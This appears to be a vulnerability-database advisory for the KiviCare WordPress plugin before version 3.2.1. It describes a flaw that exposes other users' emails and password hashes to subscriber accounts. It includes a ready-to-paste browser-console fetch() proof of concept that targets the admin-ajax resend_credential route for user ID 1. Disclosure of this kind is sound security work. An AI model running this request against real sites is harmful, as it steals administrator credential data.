KiviCare Management System < 3.2.1 - Subscriber+ Sensitive Information Disclosure

2023-06-0500:00:00

wpvulndb

kivicare

management system

sensitive information disclosure

subscriber

web browser

developer console

user data

hashed password

email address

administrator

exploit

EPSS

0.001

Percentile

28.2%

JSON

The plugin does not restrict the information returned in a response and returns all user data, allowing low privilege users such as subscriber to retrieve sensitive information such as the user email and hashed password of other users

Run the below command in the developer console of the web browser while being on the blog as susbscriber user. This will return all user data, including the hashed password and email address of the user with ID 1 (usually the administrator)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=resend_credential&id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

EPSS

0.001

Percentile

28.2%

JSON

Related for WPEX-ID:85CC39B1-416F-4D23-84C1-FDCBFFB0DDA0